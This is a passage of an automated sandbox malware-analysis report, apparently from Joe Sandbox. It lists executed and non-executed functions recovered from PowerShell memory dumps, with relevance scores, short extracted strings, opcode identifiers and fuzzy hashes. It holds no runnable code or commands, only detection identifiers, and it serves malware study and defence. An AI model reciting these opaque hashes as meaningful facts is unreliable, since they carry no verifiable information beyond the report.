                    • Instruction Fuzzy Hash: 0CF0E5A3A1D94D4AE386AA3C94051F577C2DFC8132B554177C59EC3162ED25D4064240
                    Function 00007FFB4B2F78A9 Relevance: .0, Instructions: 30COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1623699035.00007FFB4B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ffb4b2f0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3cf9997916654e22659e0c95e089ff4ebf05f2b7157a44b96ab14fe8ab2fbbd6
                    • Instruction ID: c7768e3f80e443f9ed7da0cacbcbb3c899c196cc4cdd46e893701042bc619796
                    • Opcode Fuzzy Hash: 3cf9997916654e22659e0c95e089ff4ebf05f2b7157a44b96ab14fe8ab2fbbd6
                    • Instruction Fuzzy Hash: 9BE0D8B3B0DB190DFB8A792CA9120F977D1DF85120744087FD24EC2463DC1AA8164245

                    Executed Functions

                    Function 07BA52C0 Relevance: 8.2, Strings: 6, Instructions: 706COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ful$(ful$(ful$(ful$(ful$(ful
                    • API String ID: 0-2761319877
                    • Opcode ID: f4f12d5c42d3b999eca56439f32fbc4cf23bbdef4960e94f5966cb1fe215b38f
                    • Instruction ID: 87c95cd0dd9138368e0697146d2d1bd9f826b2f150130cc1d9038a754631dca3
                    • Opcode Fuzzy Hash: f4f12d5c42d3b999eca56439f32fbc4cf23bbdef4960e94f5966cb1fe215b38f
                    • Instruction Fuzzy Hash: D8523BB4B00209DFE724EF98C544B5EBBB2EF84214F54C0A9D8099B355DB72EE52CB91
                    Function 07BA6B93 Relevance: 6.6, Strings: 5, Instructions: 395COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ful$(ful$x.fk$x.fk$-fk
                    • API String ID: 0-4041193019
                    • Opcode ID: 87a0acc96dd9089257da6fc0157ef20c6c15c4bb99ecf523e0a6226829e1f470
                    • Instruction ID: e1dc78e441565bca4c0ea33b352d22d171c33f6a6fc746c16666a6586b22a05e
                    • Opcode Fuzzy Hash: 87a0acc96dd9089257da6fc0157ef20c6c15c4bb99ecf523e0a6226829e1f470
                    • Instruction Fuzzy Hash: 73F161B0A402199FE724EB68C950B9EB7B3EB84304F1484E5D5096F391DF72DE918B92
                    Function 07BA4EB8 Relevance: 6.5, Strings: 5, Instructions: 275COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ful$(ful$(ful$(ful$x.fk
                    • API String ID: 0-1352536150
                    • Opcode ID: c2c06e50a3dde5d2ce8de00b8c141f181a37a79c374d627996ba92f6f9958812
                    • Instruction ID: 699a1e5e58fa3c8a7c45ebc35f55aceaea38fd7cb27f9f71340820aedb337b26
                    • Opcode Fuzzy Hash: c2c06e50a3dde5d2ce8de00b8c141f181a37a79c374d627996ba92f6f9958812
                    • Instruction Fuzzy Hash: B3B182F0B00205EBE724EB68C551BAEB7E3EF88304F5081A9E4056B751DB72DE91CB91
                    Function 07BA6518 Relevance: 5.8, Strings: 4, Instructions: 803COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: x.fk$x.fk$-fk$-fk
                    • API String ID: 0-2556520698
                    • Opcode ID: 93d8908a8255f3faf04fdca6feea4596ed60bd6b58fd99d17932955206f907da
                    • Instruction ID: 3a73dc8696faee3b98a148b6b51793157e77f2a1531fbab1994969875713aa37
                    • Opcode Fuzzy Hash: 93d8908a8255f3faf04fdca6feea4596ed60bd6b58fd99d17932955206f907da
                    • Instruction Fuzzy Hash: 3F729EB4A042199FEB14EFA8C950B9EBBB2EF84304F1481A9D4096F395CF71DD91CB91
                    Function 07BA7183 Relevance: 4.2, Strings: 3, Instructions: 452COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ful$x.fk$-fk
                    • API String ID: 0-3327244402
                    • Opcode ID: 43cd5c6aab16cb718643150113a754a3fc32b96a12781e99a62e4965d73b5a7f
                    • Instruction ID: 5267b9b3a3715dc0d029c80d1440a9bb1d0ec4e3ec5983963656549edb7d42f5
                    • Opcode Fuzzy Hash: 43cd5c6aab16cb718643150113a754a3fc32b96a12781e99a62e4965d73b5a7f
                    • Instruction Fuzzy Hash: BF027EB4A14209AFE714EF58C950B9EBBB2EB88304F14C1A9D9096F355CF71DD82CB91
                    Function 07BA4E99 Relevance: 4.0, Strings: 3, Instructions: 254COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ful$(ful$x.fk
                    • API String ID: 0-2383735965
                    • Opcode ID: 18dc3fa224244c47c3116cb3204ce17014fe0dcfc2a777a3250dcb2105d5a6c6
                    • Instruction ID: ee2f868f2dbe00a8c09b22ebf7ded7a2b2079ca6836b597d5f6d7a56d91f0365
                    • Opcode Fuzzy Hash: 18dc3fa224244c47c3116cb3204ce17014fe0dcfc2a777a3250dcb2105d5a6c6
                    • Instruction Fuzzy Hash: 2FA18FF0A04205EFE724EB68C540BAEBBF2EF85304F1481A9E4056B351DB72EE95CB51
                    Function 07BA2AC8 Relevance: 3.1, Strings: 2, Instructions: 643COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 84sl$84sl
                    • API String ID: 0-2994421236
                    • Opcode ID: 7d2f22781701c17058ad7b90780610f780a28c0cb6e23f3568b7383afa722c04
                    • Instruction ID: 70d7e6837d5776dcb0958bf560a1dcd7cd3567ec6f1950919431e14bc291491a
                    • Opcode Fuzzy Hash: 7d2f22781701c17058ad7b90780610f780a28c0cb6e23f3568b7383afa722c04
                    • Instruction Fuzzy Hash: DE22E8B170C346AFEB25AB68C8507AABBA1FFC6610F1480EBD445CF252DB35C945C7A1
                    Function 07BA52A3 Relevance: 3.0, Strings: 2, Instructions: 524COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ful$(ful
                    • API String ID: 0-51623107
                    • Opcode ID: c009903accd551f3ee886dd626655cf2c6a0742dcd74360275517133783f84c2
                    • Instruction ID: 51269f6f589b3933a30551418d229cd2fdd0a03a68d0e092fa950dcf0e592ef6
                    • Opcode Fuzzy Hash: c009903accd551f3ee886dd626655cf2c6a0742dcd74360275517133783f84c2
                    • Instruction Fuzzy Hash: E7223AB4A04205EFEB24DF58C544B5EBBB2EF84314F25C1A9D8099B356CB72EE52CB41
                    Function 07BA7568 Relevance: 2.8, Strings: 2, Instructions: 257COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: x.fk$-fk
                    • API String ID: 0-2755095010
                    • Opcode ID: 7ab98e9cd870a0646f1e18bf4ac3c6d487deec24ab4842d04eb2f241dc30c5f7
                    • Instruction ID: 3f13b6e0fa7e88715636b897b2df1fa5622c1c7a5077bd14bcb2a3a695fef048
                    • Opcode Fuzzy Hash: 7ab98e9cd870a0646f1e18bf4ac3c6d487deec24ab4842d04eb2f241dc30c5f7
                    • Instruction Fuzzy Hash: F3A170B5A14209AFEB14EFA8C944B9EBBB2EB88304F14C0A9D4056F355CF71E951CB51
                    Function 07BA59A1 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ful
                    • API String ID: 0-517230495
                    • Opcode ID: b9bad42f9c18b46af8f4cc315d202accd61b9fb134b8e88a0ffe237f2fc205b1
                    • Instruction ID: d18fbcf3d0e1593575b7ed62a35c6a6f5150dfe8d345ab2cb81092c06858936b
                    • Opcode Fuzzy Hash: b9bad42f9c18b46af8f4cc315d202accd61b9fb134b8e88a0ffe237f2fc205b1
                    • Instruction Fuzzy Hash: 4FF128B4B00205EFE724DF58C544B5EBBA2EF84314F14C1A9E9099B352DB72EE52CB91
                    Function 07BA798E Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: x.fk
                    • API String ID: 0-1423657076
                    • Opcode ID: c240176ea22591072f6df6130aeb21e584c8fd1fbc513d9fae0f1a4cc234b9dd
                    • Instruction ID: fbaae50ea6ac4275485112adb845e9d2dfbeed70a4aab11b3d8ff02a609ba28e
                    • Opcode Fuzzy Hash: c240176ea22591072f6df6130aeb21e584c8fd1fbc513d9fae0f1a4cc234b9dd
                    • Instruction Fuzzy Hash: DA319375B50214ABF304EBB8C850BAF7AA3EBC5344F508468E9016F391CFB59D518B92
                    Function 07BA7E08 Relevance: .7, Instructions: 689COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c0e465e7c93872ea84b3ae250bb6f0787802b84d9b4f69d2bf3b8cc0ed11ffd5
                    • Instruction ID: dbfe8722fa9870c6f089fdc672e0dea5c692f4e748b4ead53524a77a3a42a357
                    • Opcode Fuzzy Hash: c0e465e7c93872ea84b3ae250bb6f0787802b84d9b4f69d2bf3b8cc0ed11ffd5
                    • Instruction Fuzzy Hash: 96324AF1B08206AFEB26AB69D4007AAB7E2EFC5611F1480FAD546CB651DF31CD41C7A1
                    Function 07BA9F28 Relevance: .6, Instructions: 586COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b93e152071f7d520cad3a8b64ef7d133e90c707fb179c8a225cd5c0896757598
                    • Instruction ID: 74cd33d9a219beefd9923002ded98df4623742ce02b27a89d69150de04ad3eb1
                    • Opcode Fuzzy Hash: b93e152071f7d520cad3a8b64ef7d133e90c707fb179c8a225cd5c0896757598
                    • Instruction Fuzzy Hash: 40123AF2B08306AFEB15AB6D840076AB7A2DFC6211F14C0FAD506DB291DF36D951C7A1
                    Function 07BA8718 Relevance: .3, Instructions: 291COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8caecf9f46cb451b03016f19ae4d4fe0a6beaa518300a1543fbbb74363a115f2
                    • Instruction ID: 0eb0b8fba6d959b09ecd8a3f6ea465f6bc70b99aa5a941472fa793833fca16f5
                    • Opcode Fuzzy Hash: 8caecf9f46cb451b03016f19ae4d4fe0a6beaa518300a1543fbbb74363a115f2
                    • Instruction Fuzzy Hash: BBA139F170830AAFEB16AB78C410B6A77A2AFC5200F1480EAD545CF691DF35DD91C7A2
                    Function 07BA86FD Relevance: .1, Instructions: 137COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c80db7e144e3ab99e89e1b00b72da15ecaf09fb96e23fcb7820b3bd2f9a9f7bd
                    • Instruction ID: 878399debf1e77f4bf8d5dee6b89783d6e5d7ef671cbe503c78d02e34df8ccb5
                    • Opcode Fuzzy Hash: c80db7e144e3ab99e89e1b00b72da15ecaf09fb96e23fcb7820b3bd2f9a9f7bd
                    • Instruction Fuzzy Hash: E04139F1B08206EFEB12AF28C544B6E77E2EF85240F1880E6D5009F661EB35D990D762
                    Function 07BA0B48 Relevance: .1, Instructions: 124COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8c6798f48b3afc08b1764851f2c2f193934e97d6bafe2586432e24e276ae8e2f
                    • Instruction ID: 62907f63a71d43f7dbcdc176e8c11c3354333ea3d0c095537017c6b53caf9bc1
                    • Opcode Fuzzy Hash: 8c6798f48b3afc08b1764851f2c2f193934e97d6bafe2586432e24e276ae8e2f
                    • Instruction Fuzzy Hash: 75414AF2B04315ABEB24BB69894036EF7A1EFC5614F5485AAD816EB200FB31DA41C7D1
                    Function 07BA9F0D Relevance: .1, Instructions: 121COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 674a7acc4a7d217d027fc94ca9af3df21ad4eeb7dd6aae1a3ed09b14e52cc017
                    • Instruction ID: f972e64d1d14e340d0dd95be346abb00b891b16f653cbf8327a67de45ed2c1b4
                    • Opcode Fuzzy Hash: 674a7acc4a7d217d027fc94ca9af3df21ad4eeb7dd6aae1a3ed09b14e52cc017
                    • Instruction Fuzzy Hash: B14129F2A08207ABEB60AF688540B6E77A2DF85300F14C0F5D9049F295EB36ED95D771
                    Function 07BA0EE0 Relevance: .1, Instructions: 94COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 311110a781bf1de0f5cafb82c1e517b6f717eed26dd2f5eaa67e1a24c304b732
                    • Instruction ID: 44396b0b988932c30c4e2dcbfb99cfb05e5d0977ebeb007724d87eed33e8aef4
                    • Opcode Fuzzy Hash: 311110a781bf1de0f5cafb82c1e517b6f717eed26dd2f5eaa67e1a24c304b732
                    • Instruction Fuzzy Hash: 1E216EB23083077BF7247ABA4491B3B7286DBC5711F24847AA505EB281ED73C9809361
                    Function 07BA1020 Relevance: .1, Instructions: 94COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fb03e24bfd93ed185e554b7fed9171617846cb2a9ed332cd5853519349533e1e
                    • Instruction ID: 53b4e5dabdd9f925ffb1d4a627eca66cb7a6b840bd29868e6d80baf83de13cf6
                    • Opcode Fuzzy Hash: fb03e24bfd93ed185e554b7fed9171617846cb2a9ed332cd5853519349533e1e
                    • Instruction Fuzzy Hash: 0D213EB231834EBBFB78797E5801777B2AADBC1611F3484BAE505C7281DE75C9408361
                    Function 07BA0EC3 Relevance: .1, Instructions: 81COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0804bebb0350966af62b7150279388c9cdd738996f1b79f20abf746e347ac8b8
                    • Instruction ID: 1f315a92c194d362a5d6fd91773449c51a057d0534cb45e4ef610ced0a25d9b0
                    • Opcode Fuzzy Hash: 0804bebb0350966af62b7150279388c9cdd738996f1b79f20abf746e347ac8b8
                    • Instruction Fuzzy Hash: 6B216BF230C34A7FF7147A6A84917777B959F86700F6880E6E544EB2C2EA76C980D361
                    Function 07BA1001 Relevance: .1, Instructions: 77COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: de622e4a706896fbe313642acdad17f154d0b5f773302bf60a1af7a40466430d
                    • Instruction ID: 0773f1008a074b51f15e0885decf41ad82d18c3fbbf7963f8780125d4c731783
                    • Opcode Fuzzy Hash: de622e4a706896fbe313642acdad17f154d0b5f773302bf60a1af7a40466430d
                    • Instruction Fuzzy Hash: 0A2104F230C3CD6FFB752A7E48107667BB5CB82610F2880F6E644CB292D96989448322
                    Function 07BA0B29 Relevance: .1, Instructions: 73COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8ef3ecfbf7c256c3e0a88343124c1fb22e182c47c041e8b0a1e4d96efe5b7b25
                    • Instruction ID: e48decf5a8b9a19c25e49080137a51306343593d1c90e3e69e35d0232c3121ef
                    • Opcode Fuzzy Hash: 8ef3ecfbf7c256c3e0a88343124c1fb22e182c47c041e8b0a1e4d96efe5b7b25
                    • Instruction Fuzzy Hash: F121C4F6A08356EFDB25BF69C640369FBB0EF46214F6541DAD854E7201E330D914CBA1
                    Function 07BA0CD0 Relevance: .1, Instructions: 52COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b011b685b8d79aac165a8daae81de1591723a268bd3e8eb9bc49be9fcaeb4fc
                    • Instruction ID: 782bf3a82483a368c50af6c14bfa2bfae42295f8b5f4737d8fd22097f091c0d5
                    • Opcode Fuzzy Hash: 5b011b685b8d79aac165a8daae81de1591723a268bd3e8eb9bc49be9fcaeb4fc
                    • Instruction Fuzzy Hash: 4F01F7B730821A7BE71479AAA400676BB99DFC5622F14C07FDD9AC7241FA32D845C7A0
                    Function 07BA30AC Relevance: .0, Instructions: 24COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 459583b019833b2cda6d8958613874c924160172e3fc49d10fa545262b1abcdb
                    • Instruction ID: 104a25f15345d98740df8e53751efef483f198d228beb890c90374964a06b30c
                    • Opcode Fuzzy Hash: 459583b019833b2cda6d8958613874c924160172e3fc49d10fa545262b1abcdb
                    • Instruction Fuzzy Hash: 57F039B460D281AFE3629B18D855B20BFB1AB82214B1CC0EBD0548F1A3C367C886CB61

                    Non-executed Functions

                    Function 07BAE538 Relevance: 8.9, Strings: 7, Instructions: 191COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ful$(ful$(ful$(ful$4rl$4rl$tLgk
                    • API String ID: 0-2005697466
                    • Opcode ID: 1e2f31eeb284a41ef840053098e504ab65f7d51cc085c3a77954e56eb896a66c
                    • Instruction ID: a8ff0269063ad02cf70df95c2978538d413ef8442d572627259b319e9afa1684
                    • Opcode Fuzzy Hash: 1e2f31eeb284a41ef840053098e504ab65f7d51cc085c3a77954e56eb896a66c
                    • Instruction Fuzzy Hash: AD61B1B0B04209EFE714EB68C445B6AB7E3EFC9610F1485A9D41AAB344DB71ED41CB92
                    Function 07BA95A8 Relevance: 5.5, Strings: 4, Instructions: 483COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: kl$kl$kl$kl
                    • API String ID: 0-457254638
                    • Opcode ID: 623ccbdf4ce700038fc3e153dd58492174131758b20181a5cecc9c9933ebda71
                    • Instruction ID: 5fe87096b56bbd3b60627043ce646b567faa2829feec176c04977926a481b1c9
                    • Opcode Fuzzy Hash: 623ccbdf4ce700038fc3e153dd58492174131758b20181a5cecc9c9933ebda71
                    • Instruction Fuzzy Hash: B4F14AF2B08306AFEB14AB6DD4007AAB7E5EFC5210F1480BAD545CB251DB31E952D7A1
                    Function 07BADFA0 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ful$(ful$x.fk$-fk
                    • API String ID: 0-2452553513
                    • Opcode ID: 648240781b55bf2e91d8bee679d589643e208cf871af56659b5a4a041c4ba264
                    • Instruction ID: a93dfe016476d04f85724e71aa6ba6ce3e55da49315675801c3547f8a552ef2d
                    • Opcode Fuzzy Hash: 648240781b55bf2e91d8bee679d589643e208cf871af56659b5a4a041c4ba264
                    • Instruction Fuzzy Hash: 15C1A2B0A04305EBEB24EF64C551BAEB7F2EF88704F1484A9E8056B754DB71ED41CB91
                    Function 07BA7B48 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ful$(ful$(ful$(ful
                    • API String ID: 0-100295639
                    • Opcode ID: bc1b0e6eb38d1f4e194ea07f664c18fed225891dba00fdd3f72241415f9f1399
                    • Instruction ID: 031aa5fee5ed8b5514f5aeed109bc4b9f707478555bb14f07e50e0784f56f1bd
                    • Opcode Fuzzy Hash: bc1b0e6eb38d1f4e194ea07f664c18fed225891dba00fdd3f72241415f9f1399
                    • Instruction Fuzzy Hash: 237162F0A08205EFEB14EF58C550B6EBBB2EF89214F1481A9E805AB351DF32DD51CB91
                    Function 07BAE51A Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ful$(ful$4rl$tLgk
                    • API String ID: 0-2221605959
                    • Opcode ID: 1df035498cb93329bdd58ca42cbebd0f4d0b7061c2da983fc751664df2fdea4b
                    • Instruction ID: da36b76eec6a6d193f239e4b09af6508d99b19039208df030c2caa74b0d785a4
                    • Opcode Fuzzy Hash: 1df035498cb93329bdd58ca42cbebd0f4d0b7061c2da983fc751664df2fdea4b
                    • Instruction Fuzzy Hash: 5651D4B4A04205EFEB14EF58C445AAAB7F3EF89314F1485AAE415AB350DB32DD41CB51